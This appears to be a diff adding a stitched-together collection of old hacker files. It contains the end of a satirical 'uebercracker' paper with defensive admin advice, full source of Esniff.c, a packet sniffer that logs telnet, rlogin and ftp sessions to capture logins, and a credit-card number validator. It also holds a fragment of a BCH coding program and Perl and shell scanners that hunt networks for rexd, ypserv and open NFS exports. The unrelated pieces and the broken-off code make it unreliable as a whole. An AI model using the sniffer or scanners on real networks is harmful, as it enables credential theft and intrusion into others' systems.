+programs suid root (look in Unix manual from step 3 if confused). After
+finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
+new bug in that program and you wrote a script for it.  If they ask how it
+works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
+them to trade for their get-root scripts.
+
+Step 9. Make them send you some scripts before you send some garbage file
+(ie. a big core file). Tell them it is encrypted or it was messed up and
+you need to upload your script again.
+
+Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be
+obnoxious on #hack otherwise people will look down on you and not give you
+anything.)
+
+Step 11. Hopefully you will now have at least one or two scripts that get
+you root on most Unixes. Grab root on your local machines, read your
+admin's mail, or even other user's mail, even rm log files and whatever
+temps you. (look in Unix manual from step 3 if confused).
+
+Step 12. A good test for true uebercrackerness is to be able to fake mail.
+Ask other uebercrackers how to fake mail (because they have had to pass the
+same test). Email your admin how "layme" he is and how you got root and how
+you erased his files, and have it appear coming from satan@evil.com.
+
+Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
+about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
+a uebercracker.)
+
+Step 14. Wait a few months and have all your notes, etc ready in your room
+for when the FBI, Secret Service, and other law enforcement agencies
+confiscate your equipment. Call eff.org to complain how you were innocent
+and how you accidently gotten someone else's account and only looked
+because you were curious. (Whatever else that may help, throw at them.)
+
+Step 15. Now for the true final supreme eliteness of all uebercrackers, you
+go back to #hack and brag about how you were busted.  YOU are finally a
+true Uebercracker.
+
+
+Now the next part of the paper is top secret.  Please only pass to trusted
+administrators and friends and even some trusted mailing lists, Usenet
+groups, etc. (Make sure no one who is NOT in the inner circle of security
+gets this.)
+
+This is broken down on How to Become an UeberAdmin (otherwise know as a
+security expert) and How to stop Uebercrackers.
+
+Step 1. Read Unix manual ( a good idea for admins ).
+
+Step 2. Very Important.  chmod 700 rdist; chmod 644 /etc/utmp. Install
+sendmail 8.6.4.  You have probably stopped 60 percent of all Uebercrackers
+now.  Rdist scripts is among the favorites for getting root by
+uebercrackers.
+
+Step 3. Okay, maybe you want to actually secure your machine from the
+elite Uebercrackers who can break into any site on Internet.
+
+Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
+packets. (This only applies to advanced admins who have control of the
+router, but this will stop 90% of all uebercrackers from attempting your
+site.)
+
+Step 5. Apply all CERT and vendor patches to all of your machines. You have
+just now killed 95% of all uebercrackers.
+
+Step 6. Run a good password cracker to find open accounts and close them.
+Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
+to find if a uebercracker is knocking on your machines.  Run ISS to make
+sure that all your machines are reasonably secure as far as remote
+configuration (ie. your NFS exports and anon FTP site.)
+
+Step 7. If you have done all of the following, you will have stopped 99%
+of all uebercrackers. Congrats! (Remember, You are the admin.)
+
+Step 8. Now there is one percent of uebercrackers that have gained
+knowledge from reading some security expert's mail (probably gained access
+to his mail via NFS exports or the guest account.  You know how it is, like
+the mechanic that always has a broken car, or the plumber that has the
+broken sink, the security expert usually has an open machine.)
+
+Step 9. Here is the hard part is to try to convince these security experts
+that they are not so above the average citizen and that by now giving out
+their unknown (except for the uebercrackers) security bugs, it would be a
+service to Internet.  They do not have to post it on Usenet, but share
+among many other trusted people and hopefully fixes will come about and
+new pressure will be applied to vendors to come out with patches.
+
+Step 10.  If you have gained the confidence of enough security experts,
+you will know be a looked up to as an elite security administrator that is
+able to stop most uebercrackers.  The final true test for being a ueberadmin
+is to compile a IRC client, go onto #hack and log all the bragging and
+help catch the uebercrackers. If a uebercracker does get into your system,
+and he has used a new method you have never seen, you can probably tell
+your other security admins and get half of the replies like - "That bug
+been known for years, there just isn't any patches for it yet. Here's my
+fix." and the other half of the replies will be like - "Wow.  That is very
+impressive. You have just moved up a big notch in my security circle."
+VERY IMPORTANT HERE:  If you see anyone in Usenet's security newsgroups
+mention anything about that security hole, Flame him for discussing it
+since it could bring down Internet and all Uebercrackers will now have it
+and the million other reasons to keep everything secret about security.
+
+
+Well, this paper has shown the finer details of security on Internet. It has
+shown both sides of the coin.  Three points I would like to make that would
+probably clean up most of the security problems on Internet are as the
+following:
+
+1.  Vendors need to make security a little higher than zero in priority.
+If most vendors shipped their Unixes already secure with most known bugs
+that have been floating around since the Internet Worm (6 years ago) fixed
+and patched, then most uebercrackers would be stuck as new machines get
+added to Internet.  (I believe Uebercracker is German for "lame copy-cat
+that can get root with 3 year old bugs.") An interesting note is that
+if you probably check the mail alias for "security@vendor.com", you will
+find it points to /dev/null.  Maybe with enough mail, it will overfill
+/dev/null.  (Look in manual if confused.)
+
+2.  Security experts giving up the attitude that they are above the normal
+Internet user and try to give out information that could lead to pressure
+by other admins to vendors to come out with fixes and patches.  Most
+security experts probably don't realize how far their information has
+already  spread.
+
+3.  And probably one of the more important points is just following the
+steps I have outlined for Stopping a Uebercracker.
+
+
+Resources for Security:
+   Many security advisories are available from anonymous ftp cert.org.
+Ask archie to find tcp_wrapper, security programs.  For more information
+about ISS (Internet Security Scanner), email cklaus@shadow.net.
+
+
+Acknowledgments:
+
+   Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
+Miles, Scott Yelich, and Henri De Valois.
+
+
+Copyright:
+
+This paper is Copyright 1993, 1994.  Please distribute to only trusted
+people.  If you modify, alter, disassemble, reassemble, re-engineer or have
+any suggestions or comments, please send them to:
+
+cklaus@shadow.net
+
+
+
+------------------------------------------------------------------------------
+
+/* [JOIN THE POSSE!] */
+
+/* Esniff.c */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <string.h>
+
+#include <sys/time.h>
+#include <sys/file.h>
+#include <sys/stropts.h>
+#include <sys/signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+
+#include <net/if.h>
+#include <net/nit_if.h>
+#include <net/nit_buf.h>
+#include <net/if_arp.h>
+
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#include <netinet/ip_var.h>
+#include <netinet/udp_var.h>
+#include <netinet/in_systm.h>
+#include <netinet/tcp.h>
+#include <netinet/ip_icmp.h>
+
+#include <netdb.h>
+#include <arpa/inet.h>
+
+#define ERR stderr
+
+char    *malloc();
+char    *device,
+        *ProgName,
+        *LogName;
+FILE    *LOG;
+int     debug=0;
+
+#define NIT_DEV     "/dev/nit"
+#define CHUNKSIZE   4096        /* device buffer size */
+int     if_fd = -1;
+int     Packet[CHUNKSIZE+32];
+
+void Pexit(err,msg)
+int err; char *msg;
+{ perror(msg);
+  exit(err); }
+
+void Zexit(err,msg)
+int err; char *msg;
+{ fprintf(ERR,msg);
+  exit(err); }
+
+#define IP          ((struct ip *)Packet)
+#define IP_OFFSET   (0x1FFF)
+#define SZETH       (sizeof(struct ether_header))
+#define IPLEN       (ntohs(ip->ip_len))
+#define IPHLEN      (ip->ip_hl)
+#define TCPOFF      (tcph->th_off)
+#define IPS         (ip->ip_src)
+#define IPD         (ip->ip_dst)
+#define TCPS        (tcph->th_sport)
+#define TCPD        (tcph->th_dport)
+#define IPeq(s,t)   ((s).s_addr == (t).s_addr)
+
+#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
+
+#define MAXBUFLEN  (128)
+time_t  LastTIME = 0;
+
+struct CREC {
+     struct CREC *Next,
+                 *Last;
+     time_t  Time;              /* start time */
+     struct in_addr SRCip,
+                    DSTip;
+     u_int   SRCport,           /* src/dst ports */
+             DSTport;
+     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
+     u_int   Length;            /* current data length */
+     u_int   PKcnt;             /* # pkts */
+     u_long  LASTseq;
+};
+
+struct CREC *CLroot = NULL;
+
+char *Symaddr(ip)
+register struct in_addr ip;
+{ register struct hostent *he =
+      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
+
+  return( (he)?(he->h_name):(inet_ntoa(ip)) );
+}
+
+char *TCPflags(flgs)
+register u_char flgs;
+{ static char iobuf[8];
+#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
+
+  SFL(0,TH_FIN, 'F');
+  SFL(1,TH_SYN, 'S');
+  SFL(2,TH_RST, 'R');
+  SFL(3,TH_PUSH,'P');
+  SFL(4,TH_ACK, 'A');
+  SFL(5,TH_URG, 'U');
+  iobuf[6]=0;
+  return(iobuf);
+}
+
+char *SERVp(port)
+register u_int port;
+{ static char buf[10];
+  register char *p;
+
+   switch(port) {
+     case IPPORT_LOGINSERVER: p="rlogin"; break;
+     case IPPORT_TELNET:      p="telnet"; break;
+     case IPPORT_SMTP:        p="smtp"; break;
+     case IPPORT_FTP:         p="ftp"; break;
+     default: sprintf(buf,"%u",port); p=buf; break;
+   }
+   return(p);
+}
+
+char *Ptm(t)
+register time_t *t;
+{ register char *p = ctime(t);
+  p[strlen(p)-6]=0; /* strip " YYYY\n" */
+  return(p);
+}
+
+char *NOWtm()
+{ time_t tm;
+  time(&tm);
+  return( Ptm(&tm) );
+}
+
+#define MAX(a,b) (((a)>(b))?(a):(b))
+#define MIN(a,b) (((a)<(b))?(a):(b))
+
+/* add an item */
+#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
+  register struct CREC *CLtmp = \
+        (struct CREC *)malloc(sizeof(struct CREC)); \
+  time( &(CLtmp->Time) ); \
+  CLtmp->SRCip.s_addr = SIP.s_addr; \
+  CLtmp->DSTip.s_addr = DIP.s_addr; \
+  CLtmp->SRCport = SPORT; \
+  CLtmp->DSTport = DPORT; \
+  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
+  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
+  CLtmp->PKcnt = 1; \
+  CLtmp->Next = CLroot; \
+  CLtmp->Last = NULL; \
+  CLroot = CLtmp; \
+}
+
+register struct CREC *GET_NODE(Sip,SP,Dip,DP)
+register struct in_addr Sip,Dip;
+register u_int SP,DP;
+{ register struct CREC *CLr = CLroot;
+
+  while(CLr != NULL) {
+    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
+        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
+            break;
+    CLr = CLr->Next;
+  }
+  return(CLr);
+}
+
+#define ADDDATA_NODE(CL,DATA,LEN) { \
+ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
+ CL->Length += LEN; \
+}
+
+#define PR_DATA(dp,ln) {    \
+  register u_char lastc=0; \
+  while(ln-- >0) { \
+     if(*dp < 32) {  \
+        switch(*dp) { \
+            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
+                        break; \
+            case '\r': \
+            case '\n': fprintf(LOG,"\n     : "); \
+                        break; \
+            default  : fprintf(LOG,"^%c", (*dp + 64)); \
+                        break; \
+        } \
+     } else { \
+        if(isprint(*dp)) fputc(*dp,LOG); \
+        else fprintf(LOG,"(%d)",*dp); \
+     } \
+     lastc = *dp++; \
+  } \
+  fflush(LOG); \
+}
+
+void END_NODE(CLe,d,dl,msg)
+register struct CREC *CLe;
+register u_char *d;
+register int dl;
+register char *msg;
+{
+   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
+   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
+   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
+   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
+                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
+   fprintf(LOG," DATA: ");
+    { register u_int i = CLe->Length;
+      register u_char *p = CLe->Data;
+      PR_DATA(p,i);
+      PR_DATA(d,dl);
+    }
+
+   fprintf(LOG,"\n-- \n");
+   fflush(LOG);
+
+   if(CLe->Next != NULL)
+    CLe->Next->Last = CLe->Last;
+   if(CLe->Last != NULL)
+    CLe->Last->Next = CLe->Next;
+   else
+    CLroot = CLe->Next;
+   free(CLe);
+}
+
+/* 30 mins (x 60 seconds) */
+#define IDLE_TIMEOUT 1800
+#define IDLE_NODE() { \
+  time_t tm; \
+  time(&tm); \
+  if(LastTIME<tm) { \
+     register struct CREC *CLe,*CLt = CLroot; \
+     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
+     while(CLe=CLt) { \
+       CLt=CLe->Next; \
+       if(CLe->Time <tm) \
+           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
+     } \
+  } \
+}
+
+void filter(cp, pktlen)
+register char *cp;
+register u_int pktlen;
+{
+ register struct ip     *ip;
+ register struct tcphdr *tcph;
+
+ { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
+
+   if(EtherType < 0x600) {
+     EtherType = *(u_short *)(cp + SZETH + 6);
+     cp+=8; pktlen-=8;
+   }
+
+   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
+      return;
+ }
+
+    /* ugh, gotta do an alignment :-( */
+ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
+
+ ip = (struct ip *)Packet;
+ if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
+    return;
+ tcph = (struct tcphdr *)(Packet + IPHLEN);
+
+ if(!( (TCPD == IPPORT_TELNET) ||
+       (TCPD == IPPORT_LOGINSERVER) ||
+       (TCPD == IPPORT_FTP)
+   )) return;
+
+ { register struct CREC *CLm;
+   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
+   register u_char *p = (u_char *)Packet;
+
+   p += ((IPHLEN * 4) + (TCPOFF * 4));
+
+ if(debug) {
+  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
+  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
+  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
+ }
+
+   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
+
+      CLm->PKcnt++;
+
+      if(length>0)
+        if( (CLm->Length + length) < MAXBUFLEN ) {
+          ADDDATA_NODE( CLm, p,length);
+        } else {
+          END_NODE( CLm, p,length, "DATA LIMIT");
+        }
+
+      if(TCPFL(TH_FIN|TH_RST)) {
+          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
+      }
+
+   } else {
+
+      if(TCPFL(TH_SYN)) {
+         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
+      }
+
+   }
+
+   IDLE_NODE();
+
+ }
+
+}
+
+/* signal handler
+ */
+void death()
+{ register struct CREC *CLe;
+
+    while(CLe=CLroot)
+        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
+
+    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
+    fflush(LOG);
+    if(LOG != stdout)
+        fclose(LOG);
+    exit(1);
+}
+
+/* opens network interface, performs ioctls and reads from it,
+ * passing data to filter function
+ */
+void do_it()
+{
+    int cc;
+    char *buf;
+    u_short sp_ts_len;
+
+    if(!(buf=malloc(CHUNKSIZE)))
+        Pexit(1,"Eth: malloc");
+
+/* this /dev/nit initialization code pinched from etherfind */
+  {
+    struct strioctl si;
+    struct ifreq    ifr;
+    struct timeval  timeout;
+    u_int  chunksize = CHUNKSIZE;
+    u_long if_flags  = NI_PROMISC;
+
+    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
+        Pexit(1,"Eth: nit open");
+
+    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
+        Pexit(1,"Eth: ioctl (I_SRDOPT)");
+
+    si.ic_timout = INFTIM;
+
+    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
+        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
+
+    timeout.tv_sec = 1;
+    timeout.tv_usec = 0;
+    si.ic_cmd = NIOCSTIME;
+    si.ic_len = sizeof(timeout);
+    si.ic_dp  = (char *)&timeout;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
+
+    si.ic_cmd = NIOCSCHUNK;
+    si.ic_len = sizeof(chunksize);
+    si.ic_dp  = (char *)&chunksize;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
+
+    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
+    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
+    si.ic_cmd = NIOCBIND;
+    si.ic_len = sizeof(ifr);
+    si.ic_dp  = (char *)&ifr;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
+
+    si.ic_cmd = NIOCSFLAGS;
+    si.ic_len = sizeof(if_flags);
+    si.ic_dp  = (char *)&if_flags;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
+
+    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
+        Pexit(1,"Eth: ioctl (I_FLUSH)");
+  }
+
+    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
+        register char *bp = buf,
+                      *bufstop = (buf + cc);
+
+        while (bp < bufstop) {
+            register char *cp = bp;
+            register struct nit_bufhdr *hdrp;
+
+            hdrp = (struct nit_bufhdr *)cp;
+            cp += sizeof(struct nit_bufhdr);
+            bp += hdrp->nhb_totlen;
+            filter(cp, (u_long)hdrp->nhb_msglen);
+        }
+    }
+    Pexit((-1),"Eth: read");
+}
+ /* Authorize your proogie,generate your own password and uncomment here */
+/* #define AUTHPASSWD "EloiZgZejWyms" */
+
+void getauth()
+{ char *buf,*getpass(),*crypt();
+  char pwd[21],prmpt[81];
+
+    strcpy(pwd,AUTHPASSWD);
+    sprintf(prmpt,"(%s)UP? ",ProgName);
+    buf=getpass(prmpt);
+    if(strcmp(pwd,crypt(buf,pwd)))
+        exit(1);
+}
+    */
+void main(argc, argv)
+int argc;
+char **argv;
+{
+    char   cbuf[BUFSIZ];
+    struct ifconf ifc;
+    int    s,
+           ac=1,
+           backg=0;
+
+    ProgName=argv[0];
+
+ /*     getauth(); */
+
+    LOG=NULL;
+    device=NULL;
+    while((ac<argc) && (argv[ac][0] == '-')) {
+       register char ch = argv[ac++][1];
+       switch(toupper(ch)) {
+            case 'I': device=argv[ac++];
+                      break;
+            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
+                         Zexit(1,"Output file cant be opened\n");
+                      break;
+            case 'B': backg=1;
+                      break;
+            case 'D': debug=1;
+                      break;
+            default : fprintf(ERR,
+                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
+                            ProgName);
+                      exit(1);
+       }
+    }
+
+    if(!device) {
+        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
+            Pexit(1,"Eth: socket");
+
+        ifc.ifc_len = sizeof(cbuf);
+        ifc.ifc_buf = cbuf;
+        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
+            Pexit(1,"Eth: ioctl");
+
+        close(s);
+        device = ifc.ifc_req->ifr_name;
+    }
+
+    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
+    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
+            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
+
+    if(!LOG)
+        LOG=stdout;
+
+    signal(SIGINT, death);
+    signal(SIGTERM,death);
+    signal(SIGKILL,death);
+    signal(SIGQUIT,death);
+
+    if(backg && debug) {
+         fprintf(ERR,"[Cannot bg with debug on]\n");
+         backg=0;
+    }
+
+    if(backg) {
+        register int s;
+
+        if((s=fork())>0) {
+           fprintf(ERR,"[pid %d]\n",s);
+           exit(0);
+        } else if(s<0)
+           Pexit(1,"fork");
+
+        if( (s=open("/dev/tty",O_RDWR))>0 ) {
+                ioctl(s,TIOCNOTTY,(char *)NULL);
+                close(s);
+        }
+    }
+    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
+    fflush(LOG);
+
+    do_it();
+}
+
+
+------------------------------------------------------------------------------
+
+#! /bin/nawk -f
+# validcc.awk - validate credit card #
+{
+ # validate CardNo
+ number=""
+ CardNo = $0
+ for (indig = 1; indig <= length(CardNo); indig++) {
+  dig = substr(CardNo, indig, 1)
+  if (dig ~ /^[0-9]$/)
+   number = number dig
+  else if (dig != " ") {
+   print "bad character in CardNo" | "cat >&2"
+   break
+  }
+ }
+ digit1 = substr(number, 1, 1)
+ cclen = length(number)
+ if (digit1 == "3") {
+  print "Sorry, we do not take American Express" | "cat >&2"
+#  if (cclen != 15)
+#   print "wrong length for CardNo" | "cat >&2"
+ } else if (digit1 == "4") { # visa
+  if (cclen != 13 && cclen != 16)
+   print "wrong length for CardNo" | "cat >&2"
+ } else if (digit1 == "5") { # master card
+  if (cclen != 16)
+   print "wrong length for CardNo" | "cat >&2"
+ } else
+  print "unknown credit card" | "cat >&2"
+ if (cclen == 13)
+  bias = 0
+ else
+  bias = 1
+ for (llen = 1; llen <= cclen; llen++) {
+  cdigit = digit = substr(number, llen, 1)
+  if (((llen-1+bias)%2) == 1) # double every second digit
+   cdigit *= 2
+  if (cdigit > 9)
+   cdigit -= 9 # compensate ...
+  csum += cdigit  # ... add up all the digits
+ }
+ if ((csum%10) != 0)
+  print "bad CardNo" | "cat >&2"
+}
+
+------------------------------------------------------------------------------
+
+/* File: bch2.c
+
+     ======  Encoder/Decoder of binary primitive BCH codes ======
+
+     Robert Morelos-Zaragoza,     University of Hawaii     5/19/92
+
+    This program computes the generator polynomial of the code by
+    using cycle sets modulo n, n = 2^m - 1.
+
+   (Part of this program is adapted from a Reed-Solomon encoder/decoder
+    program, 'rs.c', for the binary case.    rs.c was created by Simon
+    Rockliff, University of Adelaide   21/9/89)
+
+   Main variables:
+
+   m = order of the field GF(2**m)
+   n = 2**m - 1 = length
+   t = error correcting capability
+   d = 2*t + 1 = designed minimum distance
+   k = n - deg(g(x)) = dimension
+
+   p[] = primitive polynomial to generate GF(2**m)
+   (read from least to most significant coefficient)
+
+   g[] = generator polynomial
+
+   alpha_to [] = log table in GF(2**m)
+   index_of[] = antilog table in GF(2**m)
+   data[] = data polynomial
+   bb[] = redundancy polynomial = x**(n-k) data[] modulo g[]
+
+   numerr = number of errors
+   errpos[] = error positions
+
+   recd[] = received polynomial
+   decerror = number of decoding errors ( in MESSAGE positions)
+
+*/
+
+#include <math.h>
+#include <stdio.h>
+
+int m, n, k, t, d ;
+int p [20] ; /* irreducible polynomial */
+int alpha_to [1024], index_of [1024], g [1024] ;
+int recd [1024], data [1024], bb [1024] ;
+int numerr, errpos [1024], decerror = 0 ;
+int seed;
+
+
+
+void read_p()
+/* Read primitive polynomial of degree m */
+  {
+ register int i;
+
+    printf("Enter m and primitive polynomial p(x): ");  scanf("%d", &m);
+    for (i=0; i<=m; i++)
+        scanf("%d", &p[i]);
+    printf("p(x) = ");
+    for (i=0; i<=m; i++)
+        printf("%1d", p[i]);
+    printf("\n");
+    n = (int)(pow(2.0,(double) m)) - 1;
+ }
+
+
+
+void generate_gf()
+/* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m]
+   lookup tables:  index->polynomial form   alpha_to[] contains j=alpha**i;
+                   polynomial form -> index form  index_of[j=alpha**i] = i
+   alpha=2 is the primitive element of GF(2**m)
+*/
+ {
+   register int i, mask ;
+
+  mask = 1 ;
+  alpha_to[m] = 0 ;
+  for (i=0; i<m; i++)
+   { alpha_to[i] = mask ;
+     index_of[alpha_to[i]] = i ;
+     if (p[i]!=0)
+       alpha_to[m] ^= mask ;
+     mask <<= 1 ;
+   }
+  index_of[alpha_to[m]] = m ;
+  mask >>= 1 ;
+  for (i=m+1; i<n; i++)
+   { if (alpha_to[i-1] >= mask)
+        alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ;
+     else alpha_to[i] = alpha_to[i-1]<<1 ;
+     index_of[alpha_to[i]] = i ;
+   }
+  index_of[0] = -1 ;
+ }
+
+
+void gen_poly()
+/* Compute generator polynomial of BCH code of length n=2^m - 1 */
+ {
+    register int ii, jj, ll, kaux;
+    int test, aux, nocycles, root, noterms, rdncy;
+    int cycle[256][11], size[256], min[128], zeros[256];
+
+/* Generate cycle sets modulo n, n = 2^m - 1 */
+    cycle[0][0] = 0; size[0] = 1;
+    cycle[1][0] = 1; size[1] = 1;
+    jj = 1;    /* cycle set index */
+    printf("Computing cycle sets modulo %d ...\n", n);
+    do
+      {
+      /* Generate the jj-th cycle set */
+      ii = 0;
+      do
+        {
+        ii++;
+        cycle[jj][ii] = (cycle[jj][ii-1]*2) % n;
+        size[jj]++;
+        aux = (cycle[jj][ii]*2) % n;
+        } while ( aux != cycle[jj][0] );
+      printf(" %d ", jj);
+      if (jj && ( (jj % 10) == 0)) printf("\n");
+      /* Next cycle set representative */
+      ll = 0;
+      do
+        {
+        ll++;
+        test = 0;
+        for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle
+sets */
+          for (kaux=0; ((kaux<size[ii]) && (!test)); kaux++)
+            if (ll == cycle[ii][kaux]) test = 1;
+        } while ( (test) && (ll<(n-1)) );
+      if (!(test))
+        {
+        jj++;   /* next cycle set index */
+        cycle[jj][0] = ll;
+        size[jj] = 1;
+        }
+      } while (ll < (n-1));
+    printf(" ... Done\n");
+    nocycles = jj; /* number of cycle sets modulo n */
+#ifdef DEBUG
+    printf("Cycle sets modulo %d:\n", n);
+    for (ii=0; ii<=nocycles; ii++) {
+      for (jj=0; jj<size[ii]; jj++)
+        printf("%d ",cycle[ii][jj]);
+      printf("\n"); }
+#endif
+
+    printf("Enter t: ");  scanf("%d", &t);
+    d = 2*t+1;
+    /* Search for roots 1, 2, ..., d-1 in cycle sets */
+    kaux = 0;
+    rdncy = 0;
+    for (ii=1; ii<=nocycles; ii++)
+      {
+      min[kaux] = 0;
+      for (jj=0; jj<size[ii]; jj++)
+        for (root=1; root<d; root++)
+          if (root == cycle[ii][jj])
+            min[kaux] = ii;
+      if (min[kaux])
+        {
+        rdncy += size[min[kaux]];
+        kaux++;
+        }
+      }
+    noterms = kaux;
+#ifdef DEBUG
+printf("roots: ", noterms);
+#endif
+    kaux = 1;
+    for (ii=0; ii<noterms; ii++)
+      for (jj=0; jj<size[min[ii]]; jj++)
+        {
+        zeros[kaux] = cycle[min[ii]][jj];
+#ifdef DEBUG
+printf("%d ", zeros[kaux]);
+#endif
+        kaux++;
+        }
+    k = n - rdncy;
+    printf("This is a (%d, %d, %d) binary BCH code\n", n, k, d);
+
+
+------------------------------------------------------------------------------
+
+#!/bin/perl -s
+#
+#   Scan a subnet for valid hosts; if given hostname, will look at the
+# 255 possible hosts on that net.  Report if host is running rexd or
+# ypserv.
+#
+#  Usage:  scan n.n.n.n
+
+# mine, by default
+$default = "130.80.26";
+
+$| = 1;
+
+if ($v) { $verbose = 1; }
+
+if ($#ARGV == -1) { $root = $default; }
+else { $root = $ARGV[0]; }
+
+# ip address
+if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
+        ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
+        ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
+        $root = "$one.$two.$three";
+        if ($root eq "..") { die "Can't figure out what to scan...\n"; }
+        }
+
+print "Subnet $root:\n" if $verbose;
+for $i (01..255) {
+        print "Trying $root.$i\t=> " if $verbose;
+        &resolve("$root.$i");
+        }
+
+#
+#  Do the work
+#
+sub resolve {
+
+local($name) = @_;
+
+# ip address
+if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
+        ($a,$b,$c,$d) = split(/\./, $name);
+        @ip = ($a,$b,$c,$d);
+        ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
+        }
+else {
+        ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
+        ($a,$b,$c,$d) = unpack('C4',$ip[0]);
+        }
+
+if ($name && @ip) {
+        print "$a.$b.$c.$d\t$name\n";
+        system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
+unning ypserv.\"\nfi\nfi");
+        }
+else { print "unable to resolve address\n" if $verbose; }
+
+}
+
+sub AF_INET {2;}
+
+
+------------------------------------------------------------------------------
+
+#!/bin/sh
+#rpc.chk 1.0
+#
+# Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
+# that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
+# or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
+# change the magic number, indicating the type of executable Bourne Shell.
+#
+# The script obtains via nslookup utility a list of hostnames from a nameserver
+# and checks every entry of the list for active rexd procedures as well as
+# ypserver procedures. The output is a list of the sites that run those
+# daemons and are insecure.
+# -yo.
+
+
+domainname=$1
+umask 022
+PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH
+
+#
+# Function collects a list of sites
+# from a nameserver. Make sure you've got the nslookup utility.
+#
+get_list() {
+(
+echo set type=ns
+echo $domainname
+) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$  2>/dev/null
+if [ ! -s .tmp$$ ]; then
+echo "No such domain" >&2
+echo "Nothing to scan" >&2
+exit 1
+fi
+for serv in `cat .tmp$$`;do
+(
+echo server $serv
+echo ls  $domainname
+) | nslookup > .file$$ 2>/dev/null
+lines=`cat .file$$ | wc -l`
